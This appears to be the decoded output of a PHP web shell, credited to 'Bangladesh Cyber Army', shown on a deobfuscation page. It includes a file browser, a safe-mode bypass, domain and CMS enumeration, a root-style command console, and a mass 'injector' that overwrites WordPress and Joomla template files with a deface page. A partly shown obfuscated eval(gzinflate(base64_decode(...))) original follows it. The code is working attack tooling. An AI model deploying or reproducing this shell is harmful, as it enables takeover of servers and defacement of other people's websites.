<script src="http://code.jquery.com/jquery-latest.min.js"></script>
</head>
<body bgcolor="black" background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif">
<style>
body{
font-family: "courier new";
background-color: black;
font-size:80%;
color: #28FE14;
background-image: url("data:image/gif;base64,R0lGODlhMgAqALMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQFCgALACwAAAAAMgAqAAAE/1DJSau9ONuTjixIISXJxHkKgpjdF7qickrqZCi3QuhTKd25lA0n2e14R+BkNVL4VkxnT0qbPoVCZsmHJeaM0x+xKv7ykOUlCwWKJQIAySwlGMhbijbsjkLUNYCBgoOEhYA1I1xzejJ4cyQTjI9cXVReRWdKl02YSWOWlVxbVVpUo5xZTaIUUZaaYJualrCyXH52TnB8e40oj7p5L70jwIbGx8jJFZNLUZC7KVFzi8JztawUXLJRmq+ZY6egrau2Vqqk55vi2UNB3GPenjm/cXS4b/Vzt9DUMXPKAAMKtCAJz7NgMQqiODgNDyNan7jAghhEG7wxsKCks6QxlZRV6YBOdaQYBo3Ja2k2wVJIrB4jlrnyOXIobKDNm8cY4kE0rCdPZtB4uvr0Lse2diWPlgznzBRHc6iYskvZpRtRpKiUxgz6p6e+rvS44sJJtqyGgzD1RUm7UxqeWd+MXu2UUitKj6ekovu4sSnIkxfdTSCprmhLXg37dGWrGNc/s4UiAAAh+QQFCgALACwBAAEAMAAoAAAE/zAlRRGi6qRDNc9bFyoSViCF+JUkplyUochzXdMy3VKE0t+Yya4S3E2ER0pSibnAlkYXDEjNxWzD3s/KTAQAFcFARQZ9PMov5ZQyp8GuuHxOr9vv+Lyd5VawyxYmKGVoL1NoQlRaVzpTi1VYU1aJS05dTZhPUYlTSYlcj1wvGKE2opIzXnCFf30IYmuDfYWvY316uLm6u3qBZXythXy0hyMsqDqJpckYp81YQp1DnKMtlEXUl0zVVFk+jEXgROIttb9qfrLC6LSwfaq88fLzesKcnYn2gm2ssmyiibgNAUjqmyKDWqAEnDKtIRFN0ao5IYgpXDdlBkEh9LEOjjkS7HOMoQs2olUreihTzuvXBpisYSXVjSB28Ic3m59sLCN3oRI3atK0WbKmbZRGnAWRitvZ7QLLN7FahvxA8syIjyqzas1TVUmirula5psZswDTm0sNDjSl08dQhZmE/sQmF8FZjFvaKoVEQwtYeGHLtAJciGUEACH5BAUKAAsALAEAAQAwACgAAAT/sKCi1EmnplQtrgjSXZkiUV5JgiKhuIoRd1wly2B3Vy68zziFaKhR1Iw0ZK5YIyJrnGPrZZsVq0ERlkcFbnOnysoYAIg/QsHgXAqn2CB1Z06v2+/4vH7Pv4dGaH9wb0ZHbhuAJYJaXkuNP0pUMJGQWoxRHZdKmFdCnp2cn4yVOlaQRz1JX54IcoSta4RjCWUVh7Wvrn27vL2+fYiDY2OCsmiHRytHP8xWn49WqZ07R5zWkZpQSk6RmMum4FmlOD/SlDG0ZsYqga7DxxMauGO/9fb3e26zhvHrGvwoxpyQdqoDwXCqJH3p4SSUlE/XqmWCuE3IwSCoujTDaFBjtBf6fNCks9XvXYmRJkrCQ4Gvpct7wQolIhlwJYuZr7QcOYfjIpdJoxAu2SmxCUWjjLIxmRiJ58+FXZ5tnIgSpUCVbfrBEtYu1suvYPnsy5SU0dhBbkIeKMjUEdtG0i46nMPo2dylrHLoNPL2mVRn33p2uTgL19Y0sQqru4pCbQQAIfkEBQoACwAsAQABADAAKAAABP8wJUUlVQUVetLhHvgpCHJ1I0qV1aVMFKHIilFTtn3r5JXjt1XrAuuZXkgkbFI8KlvNoVRG++2APKfV2ksEAJUvJbNRqMwh9AghGIjepLZrTq/b7/i8fp8/k1dOf2pwFmMahmUoVlQXToxXkEkzk5NVNUxCTpo9T52SJkegUIuUnJVYqFOUjzl+h3FuGK9nZ15gsmWCZ3y8vb6/fCyERa5lhYMkTmfCWkGSpDTPzs1ZQlBE2DCiUpjWnqE+zkXQ2KmmXKByyLZwguzIbLHL6sD19vd6tGnCuBXEaYJ07TOxZdqFR9J0PGJlsFs3U9skddu27SHBIOgOlhoXZCGljPp21qhzJwZZwFn76OFbydIev5Bw+AlMMfBECGqpMsb4iNEgKicOk1hsxClolGs4Iek8pdTnjnhwYMJCFDWlvDQts2rdI4jfsWPLlKWRSgahE0kJiebsqXBGxLNFJH7Kdq0TKLMu4nKstlYHtK7q3r2bd5WmYUQRAAA7");
}
#sysinfo{
border: 1px solid #28FE14;
position:fixed;
padding:2px;
top:1px;
left:1px;
background-color: black;
font-size:12px;
}
#phpinfo{
border: 1px solid #28FE14;
position:fixed;
padding:2px;
top:1px;
right:1px;
background-color: black;
font-size:12px;
}
#status{
border: 1px solid #28FE14;
position:fixed;
padding:2px;
bottom:1px;
right:1px;
background-color: black;
font-size:12px;
}
#infobox{
z-index:1;
border: 1px solid white;
margin-left:auto;
margin-right:auto;
margin-top:50px;
width:600px;
background-color: black;
font-size:12px;
}
.infotitle{
padding:4px;
background-color: white;
color: black;
font-family: Thaoma;
font-size:14px;
}
.infotxt{
padding:5px;
}
.sidebar{
position:fixed;
left:1px;
top:30%;
}
.stitle{
float:left;
cursor:pointer;
padding:7px;
color:black;
background-color: white;
}
.stitle:hover{
color:red;
}
.smnu{
display:none;
background-color: black;
padding:5px;
border: 1px solid white;
float:left;
}
a{
color: #df5;
text-decoration: none;
}
a:hover{
color:white;
}
.copyright{
position:fixed;
bottom:1px;
left:1px;
padding:2px;
}
.logo{
margin:auto;
width:600px;
height:600px;
background-image: url("http://4.bp.blogspot.com/-DEFzMZtxffI/Tz11pJscP9I/AAAAAAAAAIQ/4UKKPprIg5U/s1600/jh3gj7.gif");
}
.filetable{
margin-top:2px;
width:740px;
}
.tblcnt{
text-align: center;
margin-left:2px;
color:black;
background-color: white;
padding:3px;
float:left;
border: 1px solid white;
}
.tblbx1{
height:12px;
text-align: center;
margin-left:2px;
color:white;
background-color: #333333;
padding:3px;
float:left;
border: 1px solid #333333;
}
.tblbx2{
height:12px;
text-align: center;
margin-left:2px;
color:white;
background-color: #444444;
padding:3px;
float:left;
border: 1px solid #444444;
}
.tbl{
margin-top:100px;
padding-top:2px;
padding-bottom: 2px;
margin:auto;
width:742px;
border: 1px solid white;
}
.rbox{
float:left;
border: 1px solid #28FE14;
padding:10px;
}
.smit{
background-color: black;
color: #28FE14;
}
.sshbox{
display:none;
padding-left:7px;
width:600px;
height:400px;
margin: auto;
margin-top:80px;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
border-radius: 10px;
border:3px solid #FFF5F5;
background-color:#080500;
overflow:auto;
}
#sshcmd{
width:450px;
background-color: #080500;
color:#28FE14;
border:none;
}
</style>
<body>
<div class="logo" id="logo"></div>
<div id="sysinfo"><strong>OS:</strong> ';echo php_uname("s")." - ".php_uname("r")." / ".php_uname("m");;echo '</div>
<div id="phpinfo"> ';
$srvsoft = explode(" ",$_SERVER['SERVER_SOFTWARE']);
echo $srvsoft[0];
echo " PHP ".phpversion();
if( ini_get('safe_mode') ){
echo " <font color='red'>Safe Mode On</font>";
}else{
echo " <font color='blue'>Safe Mode Off</font>";
}
;echo '</div>
<div id="tbl" class="tbl" style="display:none;">
<div class="filetable">
<div class="tblcnt" style="width:220px;">Name</div>
<div class="tblcnt" style="width:80px;">Size</div>
<div class="tblcnt" style="width:100px;">Modify</div>
<div class="tblcnt" style="width:100px;">Owner</div>
<div class="tblcnt" style="width:100px;">Permission</div>
<div class="tblcnt" style="width:80px;">Action</div>
</div>
<div id="filest"></div>
<div style="clear:both;"></div>
</div>
<div id="inject" class="tbl" style="display:none;">
<div class="filetable">
<div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
<div class="tblcnt" style="width:220px;">Sitename</div>
<div class="tblcnt" style="width:160px;">CMS</div>
<div class="tblcnt" style="width:120px;">Status</div>
</div>
<div id="injtbl"></div>
<div style="clear:both;"></div>
</div>
<div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
<script>
var sidebar = false;
var sidebar2 = false;
function sidebarz(){
$(\'#logo\').hide();
if(sidebar){
$(\'#smnu\').hide();
sidebar = false;
}else{
$(\'#smnu\').show();
sidebar = true;
}
}
function sidebarz2(){
if(sidebar2){
$(\'#smnu2\').hide();
sidebar2 = false;
}else{
$(\'#smnu2\').show();
sidebar2 = true;
}
}
function filebrs(val){
hideAll();
$(\'#status\').html(\'Status: Requesting...\');
$.post("", { ac: "browse", path: val},
function(data) {
$(\'#tbl\').show();
$(\'#status\').html(\'Status: Completed (:\');
$(\'#filest\').html(data);
});
}
function doUpdt(val){
var refreshId = setInterval(function() {
$("#injtbl").load(\'rootinject.tmp\');
}, 5000);
$.ajaxSetup({ cache: false });
hideAll();
$(\'#inject\').show();
$(\'#status\').html(\'Status: Requesting...\');
$.post("", { ac: val},
function(data) {
refreshId = "";
$(\'#sidebar2\').show();
$(\'#status\').html(\'Status: Completed (:\');
$(\'#injtbl\').html(data);
});
}
function hideAll(){
k1 = 0;
k2 = 0;
$(\'#sidebar2\').hide();
$(\'#tbl\').hide();
$(\'#inject\').hide();
$(\'#infobox\').hide();
$(\'#sshbox\').hide();
}
function doReq(val){
hideAll();
$(\'#inject\').show();
$(\'#status\').html(\'Status: Requesting...\');
$.post("", { ac: val},
function(data) {
$(\'#sidebar2\').show();
$(\'#status\').html(\'Status: Completed (:\');
$(\'#injtbl\').html(data);
});
}
function doReq2(val){
hideAll();
$(\'#status\').html(\'Status: Requesting...\');
$.post("", { ac: val},
function(data) {
$(\'#infobox\').show();
$(\'#status\').html(\'Status: Completed (:\');
$(\'#infotxt\').html(data);
});
}
//Js Multi thread post request by Elo (:
var k1 = 1; var k2 = 0; var req_limit = 9;
function doInject(){
var i = 0; var j = 0;
$(\'.conf\').each(function(){
i += 1;
var id = $(this).attr(\'title\');
if(id > k1){
j += 1; k1 += 1;
var link = $(this).attr(\'href\');
var domain = $(\'#inj_dom\' + id).html();
var cms = $(this).html();
doPost2(link,cms,id,domain);
}
if(j > req_limit){return false;}
});
}
function doPost2(link,cmz,id,dmn){
if($(\'#injchk\'+id).is(\':checked\')){
$(\'#inj_status\' + id).html(\'Injecting...\');
$.ajax({
url: "",
type: "POST",
timeout: 60000,
data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
dataType: "text"
}).done(function(msg) {
k2 += 1;
$(\'#inj_status\' + id).html(\'Parse Error\');
$(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
var res_data = JSON.parse(msg);
if(res_data.status == "success"){
$(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
$(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
$(\'#inj_status\' + id).html(\'Success\');
$(\'#injst\' + id).removeClass("conf");
}
else{
if(res_data.status == "error"){
$(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
$(\'#inj_status\' + id).html(res_data.msg);
$(\'#inj_status\' + id).addClass("injerror");
$(\'#injst\' + id).removeClass("conf");
}else{
$(\'#inj_status\' + id).addClass("injerror");
$(\'#inj_status\' + id).html(\'Unknown\');
$(\'#injst\' + id).removeClass("conf");
}
}
updateInjSts(k2);
if(k1 == k2){doInject();}
}).fail(function(jqXHR, textStatus) {
k2 += 1;
$(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
$(\'#inj_status\' + id).html(\'Timeout\');
updateInjSts(k2);
if(k1 == k2){doInject();}
});
}else{
k2 += 1;
updateInjSts(k2);
if(k1 == k2){doInject();}
}
}
//Js Multi thread post request by Elo (:
function updateInjSts(k){
var tc = $(\'#sitecount\').val();
if(tc > k){
$(\'#status\').html("Status: " + k + "/" + tc + " Injected");
}else{
$(\'#status\').html("Status: Injection Complete (:");
}
}
function rmvErr(){
$(\'.injerror\').each(function(){
var nano = $(this).parent();
$(nano).remove();
});
}
function rmvSlct(){
$(\'.conf\').each(function(){
var id = $(this).attr(\'title\');
if($(\'#injchk\'+id).is(\':checked\')){
$(\'#inj\' + id).remove();
}
});
}
function retryTimeout(){
k1 = 1; k2 = 0;
doInject();
}
function doSlct(){
$(\'.conf\').each(function(){
var id = $(this).attr(\'title\');
doToggle(id);
});
}
function doToggle(dd){
if($(\'#injchk\'+dd).is(\':checked\')){
$(\'#injc\'+dd).css(\'background-color\',\'red\');
$(\'#injchk\'+dd).attr(\'checked\',false);
}else{
$(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
$(\'#injchk\'+dd).attr(\'checked\',true);
}
}
function doSSH(){
$(\'#status\').html("Status: Requesting...");
var cmd = $(\'#sshcmd\').val();
$(\'#sshcmd\').val("");
$.post("", { ac: "ssh",command: cmd},
function(data) {
$(\'#sshoutput\').append("[root@bca~]# <br />"+data+"<br />");
$(\'#status\').html("Status: Done.");
});
}
</script>
<div class="sshbox" id="sshbox">
<br />
<div id="sshoutput"></div>
[root@bca~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
</div>
<div id="sidebar" class="sidebar">
<div class="smnu" id="smnu" class="smnu">
» <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">Security Vulnerability</a></br>
» <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">System Information</a></br>
» <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP Info</a></br>
» <a href="" onClick="filebrs(\'\'); return false;">File Browser</a></br>
» <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">Get All Domains</a></br>
» <a href="" onClick="doReq(\'chkph\');return false;">CMS Detector [Simple]</a></br>
» <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS Detector [root]</a></br>
» <a href="" onClick="doReq2(\'safebypass\');return false;">Bypass PHP Safe_Mode</a></br>
» <a href="">Network Tools</a></br>
» <a href="">SQL Manager(Coming Soon)</a></br>
» <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">Command Console</a></br>
» <a href="?ac=killme">Kill Me</a></br>
</div>
<div class="stitle" onClick="sidebarz();">O</br>P</br>T</br>I</br>O</br>N</br>S</div>
</div>
<div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
<div class="smnu" style="float:right;" id="smnu2" class="smnu">
<div id="injmain">
» <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
» <a href="" onClick="">Export</a></br>
» <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
» <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
» <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
» <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
» <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
</div>
<div id="inj2nd" style="display:none;">
<div class="rbox">
<div style="clear:both;"></div>
<center><u>WordPress</u></center><br>
<input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
<input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
<input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
<input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
<input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
</div>
<div class="rbox">
<center><u>Joomla</u></center><br>
<input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
<input type="checkbox" id="ignore_def">Ignore Default Templete<br />
</div>
<div class="rbox">
<center><u>Default</u></center><br>
Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://naramamandiri.com/index.html"><br /><br />
</div>
<div style="clear:both;"></div><br />
<a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
</div>
</div>
<div class="stitle" style="float:right;" onClick="sidebarz2();">I</br>N</br>J</br>E</br>C</br>T</br>O</br>R</div>
</div>
<div style="clear:both;"></div>
<div id="status">Status: Idle...</div>
<div class="copyright">Copyright © <a href=""><font color="red">Bangladesh Cyber Army</font></a></div>
</body>
</html>';
Did this file decode correctly?
Original Code
<?php $X=
eval(gzinflate(base64_decode('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